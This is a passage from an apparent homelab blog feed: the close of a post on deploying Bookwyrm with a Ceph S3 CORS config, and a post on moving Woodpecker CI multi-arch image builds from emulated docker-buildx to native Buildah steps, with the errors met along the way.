the JSON config provided in the Bookwyrm docs, because <code>s3cmd</code>, my default S3
tool, doesn&rsquo;t support JSON for the CORS config, only XML. So I translated it
to this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-xml" data-lang="xml"><span style="display:flex;"><span><span style="color:#f92672">&lt;CORSConfiguration&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;CORSRule&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedHeader&gt;</span>*<span style="color:#f92672">&lt;/AllowedHeader&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>GET<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>HEAD<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>POST<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>PUT<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>DELETE<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;MaxAgeSeconds&gt;</span>3000<span style="color:#f92672">&lt;/MaxAgeSeconds&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;ExposeHeader&gt;</span>Etag<span style="color:#f92672">&lt;/ExposeHeader&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedOrigin&gt;</span>https://bookwyrm.example.com<span style="color:#f92672">&lt;/AllowedOrigin&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;/CORSRule&gt;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;/CORSConfiguration&gt;</span>
</span></span></code></pre></div><p>I stored the above XML config into a <code>cors.xml</code> file and applied it to my
Bookwyrm bucket with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c s3-conf setcors cors.xml s3://bookwyrm/
</span></span></code></pre></div><p>Here, <code>s3-conf</code> is the s3cmd config for my Ceph S3 setup.</p>
<p>And after that, I was finally done: Bookwyrm looked like it was supposed to! &#x1f389;</p>
<h3 id="initial-network-sync">Initial network sync?</h3>
<p>After I had finally set up my instance, I started to enter a few books, mostly
for testing purposes. Which was when I realized that I could hear a lot of disk
activity. And looking at my metrics, I found that the Bookwyrm container was
using a lot of CPU:
<figure>
    <img loading="lazy" src="high-cpu.png"
         alt="Screenshot of a Grafana time series graph. It shows the entirety of August 24th, from 00:00 to 23:59. For most of this time, the graph, which is from the bookwyrm-celery-worker container, shows more or less a flat line around 0.01, with only very occasional spikes to 0.6 at max. Then came 16:21, and the CPU utilization suddenly went up to peaks of 1.7 and did not get lower than 0.6 anymore, mostly oscillating around 1.4. This went on until about 21:45, when the line went back to 0.01."/> <figcaption>
            <p>CPU utilization of the bookwyrm-celery-worker container.</p>
        </figcaption>
</figure>
</p>
<p>Looking around a bit more, I also found that there were a lot of new objects
created in my S3 pool on Ceph:
<figure>
    <img loading="lazy" src="ceph-objects.png"
         alt="Another Grafana time series screenshot. This time, it shows the object creation and deletion in the Ceph pool used for data storage for my S3 setup. It again shows the entire day, from 00:00 to 23:59. It again mostly stays around 0, meaning no objects are created or deleted. But there is a very regular spike of 12 new objects being created every five minutes. Besides that, there are a couple of spikes, both for lots of added and lots of removed objects. The main event again happens starting around 16:21, with the creations suddenly increasing to about 600 objects. This goes on, like the celery cPU usage from the previous graph, to about 21:45, when it returns to the previous levels."/> <figcaption>
            <p>Object changes in the S3 data pool, negative values are removed objects, positive values are numbers of added objects.</p>
        </figcaption>
</figure>
</p>
<p>So it seemed that something was going on with Bookwyrm there, but I had no idea
what it might be. Checking the S3 bucket, I saw a lot more book covers appearing
in there. But I hadn&rsquo;t even done much at that point, just added a handful of
books. At that point I was flailing a little, not sure where to look next. Then I
had the idea of looking at flower, which the Bookwyrm docs advertise as a way
to look at ongoing tasks.</p>
<p>This was the picture presented to me at the time:
<figure>
    <img loading="lazy" src="bookwyrm-flower-tasklist.png"
         alt="A screenshot of flower&#39;s task list. It shows a lot of them, an entire screen of 15 tasks, all started just between 19:39:15 and 19:39:26. The shown task names only have two variations, &#39;base_activity.set_related_field&#39; and &#39;add_status_task&#39;. The args are also shown, and all seem to be the addition of &#39;Works&#39;, which I think is a book in Bookwyrm&#39;s object model."/> <figcaption>
            <p>List of tasks in Flower</p>
        </figcaption>
</figure>
</p>
<p>Noteworthy is that most of the tasks are related to <code>Work</code> objects, which, if
I&rsquo;m not mistaken, are books in Bookwyrm&rsquo;s object model. So there seem to be a lot
of things being done with a lot of books. And I had only added two or three
books myself at that point, and hadn&rsquo;t followed a single person yet. Also note
that the tasks all started in the same minute, 19:39. And it went on and on like
this.</p>
<p>Then I saw that there&rsquo;s a link to my instance in the <code>args</code> column, and I clicked
one of the tasks to get to this details page:
<figure>
    <img loading="lazy" src="bookwyrm-single-task.png"
         alt="A screenshot of flower&#39;s task details for one of the &#39;base_activity.set_related_field&#39; tasks. The important part here is the full content of the args value: &#39;Edition,Work,parent_work,https://bookwyrm.mei-home.net/book/16858,https://bookwyrm.social/book/151006&#39;."/> <figcaption>
            <p>Example of task details.</p>
        </figcaption>
</figure>
</p>
<p>I then checked which book the <a href="https://bookwyrm.mei-home.net/book/16895/s/the-dark-tower">https://bookwyrm.mei-home.net/book/16858</a>
URL shown in the <code>args</code> value points to:
<figure>
    <img loading="lazy" src="dark-tower-book.png"
         alt="A screenshot of the Bookwyrm book page for Stephen King&#39;s The Dark Tower."/> <figcaption>
            <p>This was the book the flower task related to</p>
        </figcaption>
</figure>
</p>
<p>The thing is: I hadn&rsquo;t interacted with that book, at all. So I tried a few more
books from other flower tasks, and they were the same - books I had not interacted
with. So the only conclusion I can draw for now is that Bookwyrm looks at all
known instances and downloads their entire database of books and adds them to
my instance?</p>
<p>If you actually know what&rsquo;s going on here, please contact me at <a href="https://social.mei-home.net/@mmeier">my Mastodon account</a>
and tell me. I&rsquo;m genuinely curious.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>I&rsquo;m really curious what that initial database sync (?) was for.</p>
<p>The Bookwyrm setup also holds one last challenge: Resisting the temptation of
entering all the books I&rsquo;ve read in the last 32 years. &#x1f605;</p>
<p>Last but not least, if you&rsquo;d like to follow my reading, I&rsquo;m <a href="https://bookwyrm.mei-home.net/user/mmeier">https://bookwyrm.mei-home.net/user/mmeier</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Improving Multi-Arch Image Build Performance by not Emulating</title>
      <link>https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/</link>
      <pubDate>Sat, 16 Aug 2025 21:10:15 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/</guid>
      <description>I&amp;#39;ve recently improved my container image build performance by not emulating anymore</description>
      <content:encoded><![CDATA[<p>Wherein I update my container image build pipeline in Woodpecker with buildah.</p>
<p>A couple of weekends ago, I naively thought: Hey, how about stepping away from
my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell experiments</a> for a weekend
and quickly setting up a <a href="https://joinbookwyrm.com/">Bookwyrm</a> instance?</p>
<p>As such things tend to turn out, that rookie move turned into a rather deep
rabbit hole, mostly on account of my container image build pipeline not really
being up to snuff.</p>
<h2 id="the-current-setup">The current setup</h2>
<p>Before going into details on the problem and ultimate solution, I&rsquo;d like to
sketch out my setup. For a detailed view, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-15-ci/#docker-repo-example">this post</a>.</p>
<p>I&rsquo;m running <a href="https://woodpecker-ci.org/">Woodpecker CI</a> in my Kubernetes cluster,
running container image builds via the <a href="https://woodpecker-ci.org/plugins/docker-buildx">docker-buildx plugin</a>.</p>
<p>As I&rsquo;m running Woodpecker with the <a href="https://woodpecker-ci.org/docs/administration/configuration/backends/kubernetes">Kubernetes backend</a>,
each step in a pipeline will be executed in its own Pod. Each pipeline, in turn,
gets a PersistentVolume mounted, which is shared between all steps of that
pipeline. In my pipelines for the container image builds, I only run the docker-buildx
plugin as a step: once for PRs, where the image is only built but not pushed, and
once for pushes onto main, where the image is built and pushed.</p>
<p>The docker-buildx plugin uses Docker&rsquo;s <code>buildx</code> command, and the BuildKit instance it
makes available, to run the image build. Important to note for this post is that
BuildKit will happily build multi-arch images, and it does so by running the non-native
architectures under Qemu emulation.</p>
<p>Now the issue with that is: the majority of my Homelab consists of Raspberry Pi 4s
and a single low-power x86 machine. As you might imagine, emulation is
very slow on those, especially on the Pis.</p>
<p>Now onto the problems I&rsquo;m having with that setup.</p>
<h2 id="the-problems">The problems</h2>
<p>Let&rsquo;s start with the problem which triggered this particular rabbit hole: the
Bookwyrm image build. I won&rsquo;t go into the details of the image here; that will
come in the next post, when I describe the Bookwyrm setup.</p>
<p>The initial issue was one I had seen before on occasion. In this scenario, the
build just gets canceled, with no indication of what went wrong in the Woodpecker
logs for the build step. After quite a lot of digging, I finally found these lines
in the logs of the machine running one of the failed CI Pods:</p>
<pre tabindex="0"><code>kubelet[1088]: I0728 21:07:42.763129    1088 eviction_manager.go:366] &#34;Eviction manager: attempting to reclaim&#34; resourceName=&#34;ephemeral-storage&#34;
kubelet[1088]: I0728 21:07:42.763296    1088 container_gc.go:88] &#34;Attempting to delete unused containers&#34;
kubelet[1088]: I0728 21:07:43.131475    1088 image_gc_manager.go:404] &#34;Attempting to delete unused images&#34;
kubelet[1088]: I0728 21:07:43.172539    1088 eviction_manager.go:377] &#34;Eviction manager: must evict pod(s) to reclaim&#34; resourceName=&#34;ephemeral-storage&#34;
kubelet[1088]: I0728 21:07:43.174677    1088 eviction_manager.go:395] &#34;Eviction manager: pods ranked for eviction&#34; pods=[&#34;woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4&#34;,&#34;monitoring/grafana-pg-cluster-1&#34;,&#34;harbor/harbor-pg-cluster-1&#34;,&#34;harbor/harbor-registry-5cb6c944f5-wm6np&#34;,&#34;wallabag/wallabag-679f44d9d5-9gl8m&#34;,&#34;harbor/harbor-portal-578db97949-d52sp&#34;,&#34;forgejo/forgejo-74948996b9-r94c2&#34;,&#34;harbor/harbor-jobservice-6cb7fc6d4b-gsswv&#34;,&#34;harbor/harbor-core-6569d4f449-grtrr&#34;,&#34;woodpecker/woodpecker-agent-1&#34;,&#34;taskd/taskd-6f9699f5f4-qkjkr&#34;,&#34;kube-system/cilium-5tx4t&#34;,&#34;fluentbit/fluentbit-fluent-bit-frskm&#34;,&#34;rook-ceph/csi-cephfsplugin-8f4jh&#34;,&#34;rook-ceph/csi-rbdplugin-cnxfz&#34;,&#34;kube-system/cilium-envoy-gx7ck&#34;]
crio[780]: time=&#34;2025-07-28 21:07:43.179344359+02:00&#34; level=info msg=&#34;Stopping container: 7ba324965ba9ed751bd08ac4b464631b2d5dfa05d31f36d98253b68a0d5ec7d0 (timeout: 30s)&#34; id=b69f9664-c0ae-4505-9363-6966afa90b77 name=/runtime.v1.RuntimeService/StopContainer
crio[780]: time=&#34;2025-07-28 21:07:43.837431719+02:00&#34; level=info msg=&#34;Stopped container 7ba324965ba9ed751bd08ac4b464631b2d5dfa05d31f36d98253b68a0d5ec7d0: woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4/wp-01k194yzh8bg8tzngrf7x6w3k4&#34; id=b69f9664-c0ae-4505-9363-6966afa90b77 name=/runtime.v1.RuntimeService/StopContainer
kubelet[1088]: I0728 21:07:44.097018    1088 eviction_manager.go:616] &#34;Eviction manager: pod is evicted successfully&#34; pod=&#34;woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4&#34;
</code></pre><p>The Pod had simply exhausted the node&rsquo;s ephemeral storage while building the images. The fix was relatively
simple, as Woodpecker already provides a Pipeline Volume. In the case of the
Kubernetes backend, that volume is a PVC created per pipeline and then mounted
into the Pods for all of the steps. In my case, that&rsquo;s a 50 GB CephFS volume. But
I wasn&rsquo;t using that volume for anything, as the storage for BuildKit, running my
image builds, was still at the default <code>/var/lib/docker</code>.</p>
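<p>For context, the build step in question looks roughly like this. This is a sketch
rather than my exact pipeline; the setting names are taken from the plugin docs and
the values are placeholders:</p>
<pre tabindex="0"><code>  - name: build image
    image: woodpeckerci/plugin-docker-buildx
    settings:
      repo: harbor.example.com/homelab/bookwyrm
      dockerfile: Containerfile
      platforms: linux/amd64,linux/arm64
      # Without further configuration, BuildKit keeps its state (layers, cache)
      # under /var/lib/docker, i.e. in the ephemeral storage of the step Pod.
</code></pre>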
<p>So hooray, just move the docker storage to the pipeline volume. I did so by
using the parameter the docker-buildx plugin already provides, <code>storage_path</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">storage_path</span>: <span style="color:#e6db74">&#34;/woodpecker/docker-storage&#34;</span>
</span></span></code></pre></div><p>And just like that, I had fixed the problem. Or not.
<figure>
    <img loading="lazy" src="timeout.png"
         alt="A screenshot of Woodpecker&#39;s CI run UI. It shows that the commit being build is from the &#39;bookwyrm-image&#39; branch. There are three steps in the pipeline: clone, clone Bookwyrm repo and build image. All three are seemingly successful, with clone taking 16 seconds, clone bookwyrm repo clocking in at 21s and build image taking 59:21. The overall workflow takes exactly 1h and is red. On the right is the build log for the image, showing a pip invocation. The last few lines indicate the build of the Python wheel for libsass, showing a lot of &#39;still running...&#39; outputs. The timestamps indicate that by the time of the timeout, the build was running for 21 minutes."/> <figcaption>
            <p>21 minutes and running for a libsass build.</p>
        </figcaption>
</figure>
</p>
<p>So much for that all-too-short moment of triumph. The storage issue was fixed,
but the image still could not be built. Looking through previous runs, I saw
that the issue wasn&rsquo;t just the duration of the <code>pip</code> install, but also the
initial pull of the Python image. In one of the test builds, the initial pull
took over 50 minutes all on its own. Not much time left for the actual
setup. The root cause was at least not I/O saturation. The CI run I was looking
at ran from 22:25 to 23:25 in the below graph:
<figure>
    <img loading="lazy" src="disk-io-cephfs.png"
         alt="A screenshot of a Grafana time series plot. It shows the time from 22:20 to 00:00. There are three plots shown, each representing one of the HDDs in my system. The metric is I/O utilization. At the beginning, it sits at around 20% to 35%, but at 23:23 it goes up to 80%, shortly followed by going up to around 100% for all three HDDs around 23:28. It stays there until around 23:56, when it goes back to below 10%."/> <figcaption>
            <p>I/O utilization on the HDDs in my Ceph cluster, home of the CephFS data pool.</p>
        </figcaption>
</figure>

The region of 100% I/O saturation at the end, starting at 23:25, is CephFS
cleaning up the build artifacts after the pipeline had failed. The
actual CI run is the 20% to 35% utilization before that.</p>
<p>But I still had the feeling that storage was at least part of the problem. So I
tried to use Ceph RBDs instead of CephFS, which also had the advantage of running
on SATA SSDs instead of HDDs. But that also did not bring any real improvements.
Sure, the build got a lot further and did not spend all its time just extracting
the Python image, but it still didn&rsquo;t finish within the 1h deadline.</p>
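<p>For reference, the storage class of that per-pipeline volume is configured on the
Woodpecker agent, not in the pipeline itself. A hypothetical sketch of the relevant
agent environment variables, with names as I understand them from the Kubernetes
backend docs and placeholder values:</p>
<pre tabindex="0"><code>env:
  # Storage class for the per-pipeline PVC, e.g. one backed by RBD on SSDs.
  - name: WOODPECKER_BACKEND_K8S_STORAGE_CLASS
    value: &#34;rbd-ssd&#34;
  # Size of the per-pipeline volume.
  - name: WOODPECKER_BACKEND_K8S_VOLUME_SIZE
    value: &#34;50G&#34;
  # RBD volumes are RWO, so the ReadWriteMany default has to be disabled.
  - name: WOODPECKER_BACKEND_K8S_STORAGE_RWX
    value: &#34;false&#34;
</code></pre>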
<p>I finally concluded that the reason it was still timing out was emulation.</p>
<h2 id="removing-emulation-from-my-image-build-pipelines">Removing emulation from my image build pipelines</h2>
<p>As I&rsquo;ve mentioned above, the docker-buildx Woodpecker plugin I was using relies on
<a href="https://docs.docker.com/build/buildkit/">Docker&rsquo;s BuildKit</a> under the hood.
BuildKit can do multi-arch builds out of the box, using Qemu
for the non-native architectures. This gets pretty slow on a Raspberry Pi or a
low-power x86 machine. So my next plan was to build each architecture natively,
in parallel, on hosts of that architecture.</p>
<p>BuildKit and docker-buildx already have support for doing this, via BuildKit&rsquo;s
<a href="https://docs.docker.com/build/builders/drivers/remote/">Remote Builders</a>. But
as per the docker-buildx <a href="https://codeberg.org/woodpecker-plugins/docker-buildx/src/branch/main/docs.md#using-remote-builders">documentation</a>,
this can only be done via SSH. I initially thought that this would work with
BuildKit daemons set up to receive external connections, but I was mistaken.
Instead of using BuildKit&rsquo;s built-in remote driver functionality, docker-buildx
sets up normal builders whose connection strings point to the
remote machines for which SSH was configured. BuildKit then uses those
remote machines&rsquo; Docker sockets to run the builds.</p>
<p>After some thinking, I decided to dump docker-buildx altogether. I really didn&rsquo;t
like the idea of somehow setting up inter-Pod SSH connections. That just felt
all kinds of wrong.</p>
<p>So I decided: I&rsquo;ll just do it myself, using <a href="https://buildah.io/">Buildah</a>. I&rsquo;ve
had that on my list anyway, so here we go, a bit earlier than planned. Some
inspiration for what follows was found in <a href="https://danmanners.com/posts/2022-08-tekton-cicd-multiarch-builds/">this blog post</a>.
It uses Tekton as the task engine, not Woodpecker, but it was still a good starting
point. It was especially useful for answering the question of how to assemble the
images produced for the different architectures into one manifest.</p>
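<p>The rough idea, in buildah terms: build and push one image per architecture, then
create a manifest list referencing all of them and push that under the final tag.
A sketch of what the assembly step&rsquo;s commands might look like, with hypothetical
image names rather than my final pipeline:</p>
<pre tabindex="0"><code>commands:
  # Create an empty manifest list.
  - buildah manifest create harbor.example.com/homelab/testing:0.1
  # Add the previously pushed per-architecture images to it.
  - buildah manifest add harbor.example.com/homelab/testing:0.1 docker://harbor.example.com/homelab/testing:0.1-amd64
  - buildah manifest add harbor.example.com/homelab/testing:0.1 docker://harbor.example.com/homelab/testing:0.1-arm64
  # Push the manifest list, plus the images it references, under the final tag.
  - buildah manifest push --all harbor.example.com/homelab/testing:0.1 docker://harbor.example.com/homelab/testing:0.1
</code></pre>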
<p>I started out by building the image for Buildah. The Containerfile ended up
looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> alpine_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> alpine:$alpine_ver</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apk --no-cache update<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apk --no-cache add buildah netavark iptables bash jq<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>I then set up a simple test project in Woodpecker:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/buildah/buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah build -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span></code></pre></div><p>The Containerfile looked something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> alpine_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> alpine:$alpine_ver</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apk --no-cache update<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apk --no-cache add buildah<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>Basically, a copy of my Buildah image, just to have something to test.
One thing that surprised me: Woodpecker doesn&rsquo;t actually allow
setting a platform per step. So I got lucky that the Kubernetes backend allows
me to specify the <code>nodeSelector</code> for the step&rsquo;s Pod.</p>
<p>Right away, the first run produced the following error:</p>
<pre tabindex="0"><code>Error: error writing &#34;0 0 4294967295\n&#34; to /proc/16/uid_map: write /proc/16/uid_map: operation not permittedtime=&#34;2025-08-07T20:31:45Z&#34; level=error msg=&#34;writing \&#34;0 0 4294967295\\n\&#34; to /proc/16/uid_map: write /proc/16/uid_map: operation not permitted&#34;
</code></pre><p>Clearly, my dream of rootless image builds would not be fulfilled today, so I
wanted to allow the project to run privileged pipelines. Up to now,
I had the docker-buildx plugin in a separate instance-wide list of privileged
plugins. But my new container was, at this point, a simple step, not a plugin.</p>
<p>So my first step was to set my own user as an admin, because I had never needed
admin privileges for Woodpecker before. This I did via the <code>WOODPECKER_ADMIN</code>
environment variable in my <code>values.yaml</code> file for the Woodpecker chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_ADMIN</span>: <span style="color:#e6db74">&#34;my-user&#34;</span>
</span></span></code></pre></div><p>After that, the trusted project settings appeared in the Woodpecker settings
page:
<figure>
    <img loading="lazy" src="trusted-settings.png"
         alt="A screenshot of Woodpecker&#39;s project settings page. It shows the &#39;Project&#39; tab being selected. Under the &#39;Trusted&#39; heading, the &#39;Security&#39; option checkbox is checked. The &#39;Network&#39; and &#39;Volumes&#39; options are left unchecked."/> <figcaption>
            <p>Trusted settings in the project configuration of Woodpecker. The options under the &lsquo;Trusted&rsquo; heading only show up for admin users.</p>
        </figcaption>
</figure>

Enabling the <code>Security</code> option allowed me to run the Buildah containers in
privileged mode, by adding the <code>privileged: true</code> option.</p>
<p>The next error I got was this one:</p>
<pre tabindex="0"><code>Error: &#39;overlay&#39; is not supported over overlayfs, a mount_program is required: backing file system is unsupported for this graph driver
time=&#34;2025-08-07T20:57:11Z&#34; level=warning msg=&#34;failed to shutdown storage: \&#34;&#39;overlay&#39; is not supported over overlayfs, a mount_program is required: backing file system is unsupported for this graph driver\&#34;&#34;
</code></pre><p>At this point, my pipeline volume was still on a Ceph RBD, as I had not yet realized
that, with the plan of running multiple Buildah steps for the different platforms
in parallel, I would need RWX volumes for the pipelines. So I decided that the
right solution would be to move Buildah&rsquo;s storage onto my pipeline volume, where
before it just sat in the container&rsquo;s own filesystem, leading to the above
&ldquo;OverlayFS on OverlayFS&rdquo; error. I did this by adding <code>--root /woodpecker</code>
to the Buildah command.</p>
<p>And then I got the next one:</p>
<pre tabindex="0"><code>STEP 1/2: FROM alpine:3.22.1
Error: creating build container: could not find &#34;netavark&#34; in one of [/usr/local/libexec/podman /usr/local/lib/podman /usr/libexec/podman /usr/lib/podman].  To resolve this error, set the helper_binaries_dir key in the `[engine]` section of containers.conf to the directory containing your helper binaries.
</code></pre><p>This was fixed rather easily by adding <code>netavark</code> to the Buildah image. I had a
similar error next, about <code>iptables</code> not being available. So I installed that
one as well.</p>
<p>But that wasn&rsquo;t all. Oh no, here&rsquo;s another error:</p>
<pre tabindex="0"><code>buildah --root /woodpecker build -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/
STEP 1/2: FROM alpine:3.22.1
WARNING: image platform (linux/arm64/v8) does not match the expected platform (linux/amd64)
STEP 2/2: RUN apk --no-cache update	&amp;&amp; apk --no-cache add buildah
exec container process `/bin/sh`: Exec format error
Error: building at STEP &#34;RUN apk --no-cache update	&amp;&amp; apk --no-cache add buildah&#34;: while running runtime: exit status 1
</code></pre><p>That one confused me a little bit, to be honest. It wasn&rsquo;t difficult to fix: I just
had to add the <code>--platform linux/amd64</code> option to the Buildah command. What
confused me was that Buildah didn&rsquo;t somehow figure that out for itself.</p>
<p>And this was the point where I realized that my two CI steps, one for amd64, one
for arm64, did not run in parallel. The one started only after the other had failed.
One <code>kubectl describe -n woodpecker pods wp-...</code> later, I saw that that was
because the Pod which launched second failed to mount the pipeline volume. And
that in turn was because I had switched to an SSD-backed Ceph RBD for the volume,
to improve speed. But RBDs are, by their nature as block devices, RWO, and cannot
be mounted by multiple Pods.</p>
<p>I switched the volumes back to CephFS and was met with the same error I had
seen previously and &ldquo;fixed&rdquo; by moving Buildah&rsquo;s storage onto the pipeline volume:</p>
<pre tabindex="0"><code>time=&#34;2025-08-07T21:56:14Z&#34; level=error msg=&#34;&#39;overlay&#39; is not supported over &lt;unknown&gt; at \&#34;/woodpecker/overlay\&#34;&#34;
Error: kernel does not support overlay fs: &#39;overlay&#39; is not supported over &lt;unknown&gt; at &#34;/woodpecker/overlay&#34;: backing file system is unsupported for this graph driver
time=&#34;2025-08-07T21:56:14Z&#34; level=warning msg=&#34;failed to shutdown storage: \&#34;kernel does not support overlay fs: &#39;overlay&#39; is not supported over &lt;unknown&gt; at \\\&#34;/woodpecker/overlay\\\&#34;: backing file system is unsupported for this graph driver\&#34;&#34;
</code></pre><p>I&rsquo;m not sure why it said &ldquo;unknown&rdquo;, but the filesystem was CephFS. After some
searching, I found out that OverlayFS and CephFS are seemingly incompatible. But
the issue was fixable by adding <code>--storage-driver=vfs</code> to the Buildah command.
The VFS driver doesn&rsquo;t use overlay mounts at all but instead copies each layer in
full, which makes it slower. But at least it works on CephFS.</p>
<p>And believe it or not, that was the last error. After adding the <code>--storage</code>
option, the build ran through cleanly. At this point, my Woodpecker workflow
looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/testing.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;testing/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.22.1&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah --root /woodpecker build --storage-driver=vfs --platform linux/amd64 -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
